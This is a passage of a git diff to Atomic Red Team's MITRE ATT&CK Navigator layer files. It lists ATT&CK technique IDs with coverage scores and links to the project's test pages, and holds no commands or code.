Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
index 5d88d116..0cc7caf4 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
@@ -1 +1 @@
-{"version":"4.3","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1006","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1007","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1010","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1012","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1014","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1020","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1037.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1041","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1047","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1072","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View 